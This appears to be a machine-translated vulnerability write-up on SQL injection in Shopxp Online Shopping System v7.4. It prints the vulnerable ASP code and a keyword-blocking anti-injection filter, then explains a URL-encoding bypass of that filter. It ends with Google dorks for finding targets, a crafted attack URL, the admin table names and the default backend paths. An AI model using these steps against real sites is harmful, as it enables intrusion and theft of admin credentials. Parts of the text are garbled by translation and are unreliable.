Shopxp Online Shopping System v7.4 SQL Injection Vulnerability

んㄗ S
Shopxp Online Shopping System v7.4 has the SQL injection vulnerability.
Problem file: xpCatalog_xpDesc.asp, xpCatalog_xpsmall_Desc.asp
Problem code:
<%
Dim shopxpbe_id, anclassname, shopx1__id, nclassname
Dim totalPut
Dim CurrentPage, TotalPages

If request ("shopxpbe_id") <> "then
Shopxpbe_id = request ("shopxpbe_id ")
Else
Shopxpbe_id = 0
End if
If request ("shopxpbe_id") = "" then
Shopxpbe_id = 1
End if
If not isempty (request ("page") then
CurrentPage = cint (request ("page "))
Else
CurrentPage = 1
End if

Set rs = server. createobject ("adodb. recordset ")
Rs. open "select * from shopxp_btype where shopxpbe_id =" & shopxpbe_id, conn, 1, 1
Anclassname = rs ("shopxpbe_name ")
Rs. close
%>
Shopxpbe_id is not shaping. Next we will talk about its anti-injection system. It seems to be the online anti-injection of maple leaf. Check the Code:
Dim Fy_Url, Fy_a, Fy_x, Fy_Cs (), Fy_Cl, Fy_Ts, Fy_Zx
Fy_Cl = 2 Processing Method: 1 = prompt information, 2 = Turn to page, 3 = Prompt before turning
Fy_Zx = "../" indicates the page to be redirected when an error occurs.
On Error Resume Next
Fy_Url = Request. ServerVariables ("QUERY_STRING ")
Fy_a = split (Fy_Url ,"&")
Redim Fy_Cs (ubound (Fy_a ))
On Error Resume Next
For Fy_x = 0 to ubound (Fy_a)
Fy_Cs (Fy_x) = left (Fy_a (Fy_x), instr (Fy_a (Fy_x), "=")-1)
Next
For Fy_x = 0 to ubound (Fy_Cs)
If Fy_Cs (Fy_x) <> "" Then
If Instr (LCase (Request (Fy_Cs (Fy_x), "") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "and ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "select") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "update") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "chr ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "delete % 20 from ") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), ";") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x ))), "insert") <> 0 or Instr (LCase (Request (Fy_Cs (Fy_x), "mid ") <> 0 Or Instr (LCase (Request (Fy_Cs (Fy_x), "master. ") <> 0 Then
Select Case Fy_Cl
Partial Code omitted

This anti-injection system seems to be very popular on the Internet, but it is faulty. The key is this sentence: Fy_Url = Request. ServerVariables ("QUERY_STRING"), the data obtained by Request. ServerVariables is unchanged and URL Decoding is not performed. This causes URL encoding to bypass anti-injection. The following is an analysis of the Code in lake2:

"The idea is to first obtain the submitted data, obtain and process the name/value group based on" & ", and then determine whether the value contains the defined keywords (this is simple, I only left "and"). If yes, It is injection.

At first glance, the value is checked, and it seems that there is no problem. Well, yes, there is no problem with the value, but what about the name?

Its name/value group value comes from Request. ServerVariables ("QUERY_STRING"). Sorry, there is a problem. Request. serverVariables ("QUERY_STRING") is the string submitted by the client. The url encoding is not automatically converted here. Haha, If we encode the name and submit it again, then you can bypass the check. For example, if the parameter is ph4nt0m = lake2 and lis0, the program can detect it. If you submit % 50h4nt0m = lake2 and lis0 (url encoding for p ), the program will judge the value of % 50h4nt0m, and % 50h4nt0m will be converted to ph4nt0m, so the value of % 50h4nt0m is null, so it bypasses the detection.

Wait, why can't value be bypassed since name cannot be decoded? Because the value is obtained from Request (Fy_Cs (Fy_x), the server will decode it.

How can we improve the program? You only need to obtain the decoded data submitted by the client. Change the name statement to For Each SubmitName In Request. QueryString ."

The usage is as follows:
Google: inurl: xpCatalog_xpDesc.asp? Action_key_order = big
Inurl: Catalog_Desc.asp? Action_key_order = big (this looks like a commercial version)
Construct the following address:
Http://www.xxx.com/xpCatalog_xpDesc.asp? Action_key_order = big & shopxpbe _ % 69d = 79 (URL encoding for I), hand it to the tool to manually add table names: shopxp_admin and shop_admin (for business)
The default backend is admin_shopxp or admin.